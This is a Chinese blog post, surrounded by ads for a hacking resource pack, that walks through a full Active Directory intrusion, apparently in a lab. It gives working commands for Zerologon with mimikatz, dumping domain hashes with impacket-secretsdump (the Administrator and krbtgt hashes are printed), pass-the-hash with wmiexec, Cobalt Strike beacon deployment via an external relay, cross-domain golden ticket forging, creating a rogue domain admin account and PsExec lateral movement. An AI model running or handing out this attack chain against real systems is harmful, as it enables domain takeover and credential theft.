2024年网络安全最全内网渗透:结合实战个人思路总结_内网渗透思路(1),字节跳动内部学习资料泄露

于 2024-05-12 13:03:31 发布
阅读量833 收藏 15
点赞数 25
分类专栏: 程序员 文章标签: 网络安全 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_82056337/article/details/138752780
版权

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

准备就绪开始利用cve进行置空域用户

指令:

shell mimikatz “lsadump::zerologon  /target:域控ip  /account:域控主机名$  /exploit” “exit”

成功后我们在kali利用secretsdump进行无密码提出散列值,将管理员和krbtgt的哈希记录

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e35c2b2d95f6ae63b75dbbff5195accb

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c696e9337845d8ada46612d047e40209

指令:

proxychains impacket-secretsdump -no-pass -just-dc 域名.com/域控主机名$@域控ip

现在可以利用wmiexec进行哈希传递登录了

指令:

proxychains python3 wmiexec.py -hashes 获得的hash ./用户名@域控ip

现在将三个文件拉出来保存在我们的本地

分别是sam,system,security

我们需要将域控恢复正常,不然无法正常访问

例如我们直接看虚拟机这,我直接输入正确密码都是错误的

我们先利用secretsdump将文件中的散列值提出,主要为了原本的机器码

指令:

impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

利用reinstall_original_pw进行还原

指令:

proxychains python3 reinstall_original_pw.py 域控主机名 域控ip 机器码hash

显示成功,我们可以直接来到虚拟机这里实验,直接登陆上来了

回到主轨,这时候我们先上线cs,直接用wmiexec哈希传递登录上传cs执行就可以了,但是要在cs这里做中转,相当于利用了外网的服务器做跳板,所以这里监听也写外网的内网网卡ip

将新生成的cs马启动

来到cs看到已经上线了

已经是最高权限了,这时候就是新的信息收集,这一部分忽略 我们知道还有父域的10.10.3.5所以我们要开始制作黄金票据了,首先上传mimikatz获取父子域的sid(就像实名制会员卡一人一张,计算机也一样)

指令:

shell mimikatz “privilege::debug” “lsadump::lsa /patch /user:administrator$” “lsadump::trust /patch” “exit”

黄金票据的几个要点我用txt列出来了

指令:

shell “kerberos::golden /user:administrator /domain:现在所在域控名.com /sid:子域控sid /sids:父域sid-519 /krbtgt:c696e9337845d8ada46612d047e40209  /ptt” “exit”

进行票据攻击,显示成功

但是去响应却失败

换一种思路,将3389打开并创建新的域控用户进行远程实现黄金票据

指令:

shell net user test QWEasd123 /add /domain//创建域用户
shell net group “Domain Admin” test /add /domain//添加到域管理员组

开启3389端口远程服务

进行远程登录

登录之后进行黄金票据攻击

这里成功可以交互了

上传cs的exe并利用PsExec.exe进行上线

运行exe文件查看cs是否上线,可以看到父域上线并且是最高权限

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2301_82056337
关注
  • 25
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【渗透技巧】内网渗透思路
11-30 1860
0×01 前言 假如,有一个接入点,可以访问内网服务器网段,如何尽可能的发现服务器网段中可能面临的威胁、存在的安全弱点? ×02 信息收集 首先,对服务器资产信息进行收集,了解哪些ip是存活的,存活的ip开放了哪些端口,以及端口所对应的服务。 推荐工具:F-NAScan github地址:https://github.com/ywolf/F-NAScan 网络资产信息快速收集,结果生...
2024网安最全Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
最新发布
2401_84252281的博客
05-03 1621
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
内网渗透思路
冷风
07-09 2387
内网渗透思路1.      加固,感染系统盘之外的EXE文件保护目标。2.      上键盘记录和USB插件3. 记录目标杀软。4.      抓取HASH。5.  获取目标网络环境,工作组还是域环境。6.  搜索主机是否有网络管理软件5.  搜索主机中所有docxls ppt等关键文件,并下载。6.  对方是否使用outlook,下载PST文件并抓取密码。7.      查看对方是否连接过338
内网渗透结合实战个人思路总结
fuqinderen的博客
01-13 3023
内容: 信息收集,提权,代理搭建,域横向移动,哈希传递,票据制作,跨域攻击,上线方式 环境如下: 以钓鱼形式拿下第一台外网服务器,记得设置beacon响应为实时 首先打开一个记事本准备复制粘贴要用到的数据 可以看到我们不是最高权限,第一步肯定是要进行权限提升的,先进行主机信息的收集,查看主机的系统版本,修复的补丁 本电脑为win7 可以看到收集的信息为三级域名,三个补丁 指令: shell systeminfo 其他的先不多想,进行提权,根据版本信息和补丁,ms14_0..
渗透知识-内网渗透(详细版本)
热门推荐
Jian Sun_的博客
02-11 2万+
1. 内网安全检查/渗透介绍 1.1 攻击思路 有2种思路: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式; 攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网的有用数据。 一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。 1.2 敏感资
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南是指在内网中进行的渗透测试实战指南,旨在帮助安全人员和渗透测试人员更好地理解内网安全攻防的原理和方法。 内网安全攻防渗透测试实战指南主要包含以下几个方面的内容: 1. 内网...
内网渗透思路.pdf
04-22
本文档《内网渗透思路》旨在分享一些实用的内网渗透技巧,适用于实战模拟、渗透测试学习等多个场景。 #### 二、信息收集 **重要性:** 在进行内网渗透之前,第一步是要充分收集目标服务器的信息。这一步骤至关重要...
内网渗透流程与思路和工具讲解
04-10
内网渗透测试的思路是首先收集目标网络的信息,然后探测目标网络中的主机存活情况,接着探测目标网络中的开放端口情况,最后使用各种工具和方法来渗透目标网络。 在内网渗透测试中,需要遵守相关的法律法规和道德...
内网渗透测试:MySql的利用与提权思路总结1
08-03
内网渗透测试:MySql的利用与提权思路总结1
内网渗透中的思路之一
05-01
在进行内网渗透,尤其是在比较大型的网络环境下,很可能会遇到域这样一种特殊的网络环境,而在域环境下的内网渗透又将是另外一片天 地。
内网渗透思路整理与工具使用
12-08
内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用
内网渗透简单思路
weixin_44110913的博客
10-19 1025
内网渗透简单思路 无域环境 1.nessus或goby扫描 2.尝试ms17010(win7),ms0708(win server),ms0796(win10)等 3.并可以内网嗅探,dns欺骗,内网钓鱼等 有域环境 1.寻找域内管理员,拿到域管理员权限并提权 2.内网渗透,爆hash批处理尝试登陆 3.有时候目标在内网或有防火墙,想实现3389或ssh连接这时候就要尝试搞个端口转发 4.如果内网有防火墙,尝试添加隧道代理或者从网络层应用层面搭建隧道 ...
内网渗透思路(图)
qq_45751902的博客
10-24 1498
不要立即进行getsystem,最好绕过UAC。利用powershell工具。
内网渗透的基本思路
没有
09-19 2924
内网渗透的基本思路 1.拿到外网web服务器权限 这里我使用的phpstudy搭建的靶机利用站点upload获取到基本web服务器权限。 进入站点 看到第一关,表示只能上传后缀为jpg|png|gif 这里我们借助Burpsuite工具将上传包含一句话木马后缀为png文件,后缀改为php,实现绕过。 一句话木马,后缀为png 将包放过后出现一个图片形状,右击获取图片的地址。 http://192.168.146.137/upload/upload/526.php 通过
常规内网渗透思路总结
冷风
07-05 2654
相对来说,网上的资料少之又少,很少有人对内网渗透写出一些详细的资料以供同行们参考。今天在这,只是大致的讲一下内网的一些知识。  首先,我们会在什么情况下遇见内网?如果你的目标只局限于一个小WEB,那你完全不用考虑内网了。但是,如果你的目标是一个大WEB,或者一个大公司,那你就必须考虑内网的问题。  在我们的渗透过程中,很多大型网络的外部网站或是服务器不一定有用,当然外网也可以作为我们的一个突破口,
内网渗透实战:信息收集与常用工具解析
内网渗透流程与思路和工具讲解是一门深入研究的信息安全技术,它关注的是如何通过合法或非法手段评估内部网络的安全状况,以发现潜在漏洞。以下是关于内网渗透的核心知识点: 1. **内网渗透流程**: - **阶段一:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值